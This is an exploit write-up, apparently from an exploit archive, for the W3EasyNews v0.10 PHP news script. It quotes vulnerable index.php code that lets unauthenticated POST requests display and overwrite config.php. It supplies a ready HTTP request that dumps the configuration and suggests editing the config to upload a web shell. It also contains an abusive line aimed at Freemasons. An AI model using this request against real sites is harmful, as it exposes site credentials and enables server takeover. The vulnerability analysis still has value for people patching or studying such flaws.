facebook facebook twitter rss

W3EasyNews v0.10 Show config file and Edit

Author: Asmar , Published: 08-06-2012
# --------------------------------------- #
Author : L3b-r1'z
Title : W3EasyNews v0.10 Show file and Edit
Date\Time : 8/6/2012
Email : L3br1z@Gmail.com
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : N\A
Version : 0.10
# --------------------------------------- #
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
2) Bug :
In File Index.php
first the code :

// DATA
$action = $_SERVER['PHP_SELF'];
// post
$reset = $_POST['reset'];
$form_sent = $_POST['form_sent'];
$todo = $_POST['todo'];
$todo_hist = $_POST['todo_hist'];
$text = stripslashes($_POST['text']);

We Have All Variable In POST :D

See Line

100 to 120

if ($todo == "show_config"){
if (file_exists($config) && is_file($config)){
$file = $config;
$text = read_file ($file);
$todo_hist = "show_config";
$result = "<p class='result_dis'>display: config</p>";
}
else {$result = "<p class='result_no'>config file not found</p>";}
}
// $todo - edit config
if ($todo == "edit_config"){
if (file_exists($config) && is_file($config)){
if ($todo_hist == "show_config"){
$file = $config;
write_text_to_file ($file, $text);
$result = "<p class='result_ok'>config edited</p>".$res_dis;
}
else {$result = "<p class='result_no'>wrong file: cannot edit config</p>".$res_dis;}
}
else {$result = "<p class='result_no'>config file not found</p>";}
}

The Config Variable : $config = "config.php"; // config file

So The Owner Put Show Config and Edit Config :D

But He Wan't To Edit Config For Site :D , And The Owner Does Not Thinkin that Hackers Wan't To Edit The Config ( FORM UPLOAD ) To Upload Shell :P
# --------------------------------------- #
3) PoC :

From HTTP LIVE HEADER

SNIP How To Use : http://www11.0zz0.com/2012/06/08/04/571127533.png

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/w3easyNews/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 3730

text=&todo=show_config&todo_hist=show_config&form_sent=yes

And Snip How The Config Show : http://www11.0zz0.com/2012/06/08/04/775136575.png

NOTE : Fuck All FREEMASONES
# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID.
# --------------------------------------- #

Like us on Facebook :